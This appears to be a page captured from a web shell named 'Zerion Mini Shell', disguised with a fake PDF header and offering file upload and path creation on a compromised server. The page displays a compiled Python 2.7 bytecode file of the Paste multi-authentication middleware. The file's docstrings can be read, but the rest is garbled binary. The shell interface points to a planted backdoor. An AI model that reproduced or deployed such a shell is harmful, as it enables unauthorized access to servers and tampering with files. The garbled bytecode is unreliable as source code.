%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /proc/self/root/opt/alt/python27/lib/python2.7/site-packages/paste/auth/
Upload File :
Create Path :
Current File : //proc/self/root/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyc

�
a�Nc@s]dZdefd��YZeZdgZdekrYddlZejdej�ndS(sh
Authentication via Multiple Methods

In some environments, the choice of authentication method to be used
depends upon the environment and is not "fixed".  This middleware allows
N authentication methods to be registered along with a goodness function
which determines which method should be used. The following example
demonstrates how to use both form and digest authentication in a server
stack; by default it uses form-based authentication unless
``*authmeth=digest`` is specified as a query argument.

>>> from paste.auth import form, cookie, digest, multi
>>> from paste.wsgilib import dump_environ
>>> from paste.httpserver import serve
>>>
>>> multi = multi.MultiHandler(dump_environ)
>>> def authfunc(environ, realm, user):
...     return digest.digest_password(realm, user, user)
>>> multi.add_method('digest', digest.middleware, "Test Realm", authfunc)
>>> multi.set_query_argument('digest')
>>>
>>> def authfunc(environ, username, password):
...     return username == password
>>> multi.add_method('form', form.middleware, authfunc)
>>> multi.set_default('form')
>>> serve(cookie.middleware(multi))
serving on...

tMultiHandlercBsJeZdZd�Zd�Zd�Zd�Zddd�Zd�Z	RS(	s�
    Multiple Authentication Handler

    This middleware provides two othogonal facilities:

      - a manner to register any number of authentication middlewares

      - a mechanism to register predicates which cause one of the
        registered middlewares to be used depending upon the request

    If none of the predicates returns True, then the application is
    invoked directly without middleware
    cCs(||_||_i|_g|_dS(N(tapplicationtdefaulttbindingt	predicate(tselfR((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyt__init__1s			cOs ||j||�|j|<dS(N(RR(Rtnametfactorytargstkwargs((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyt
add_method6scCs!|jj||j|f�dS(N(RtappendR(RRtchecker((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyt
add_predicate8scCs|j||_dS(s# set default authentication method N(RR(RR((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pytset_default:ss	*authmethcs3d||p|f�|j|�fd��dS(s8 choose authentication method based on a query argument s%s=%scs�|jdd�kS(NtQUERY_STRINGt(tget(tenviron(tlookfor(sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyt<lambda>AsN(R(RRtkeytvalue((RsA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pytset_query_argument=s	cCsCx0|jD]%\}}||�r
|||�Sq
W|j||�S(N(RR(RRtstart_responseR
R((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyt__call__BsN(
t__name__t
__module__t__doc__RRRRtNoneRR(((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyR#s
				t__main__i����Ntoptionflags(	RtobjectRt
middlewaret__all__RtdoctestttestmodtELLIPSIS(((sA/opt/alt/python27/lib/python2.7/site-packages/paste/auth/multi.pyt<module>!s%	

Zerion Mini Shell 1.0